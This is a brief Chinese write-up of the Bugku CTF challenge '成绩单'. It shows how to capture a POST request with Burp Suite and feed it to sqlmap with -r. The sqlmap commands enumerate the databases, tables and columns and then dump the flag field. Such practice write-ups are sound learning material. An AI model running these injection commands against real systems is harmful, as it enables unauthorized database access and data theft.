sqlmap-post型 bugku 成绩单

手工注入的话就是常规了,不写了

记录第一次用sqlmap进行post注入

第一步,用bp拦截

sqlmap-post型 bugku 成绩单_第1张图片

 

 然后选择Copy to file,保存为txt格式

我这里保存为a.txt

sqlmap-post型 bugku 成绩单_第2张图片

 

 

python sqlmap.py -r C:\Users\ASUS\Desktop\a.txt --dbs

爆数据库

然后爆表

python sqlmap.py -r C:\Users\ASUS\Desktop\a.txt --tables

爆列

python sqlmap.py -r C:\Users\ASUS\Desktop\a.txt --columns

爆字段

python sqlmap.py -r C:\Users\ASUS\Desktop\a.txt -D skctf_flag -T fl4g -C "skctf_flag" --dump

 

sqlmap-post型 bugku 成绩单_第3张图片

 

 完成任务

 

你可能感兴趣的:(sqlmap-post型 bugku 成绩单)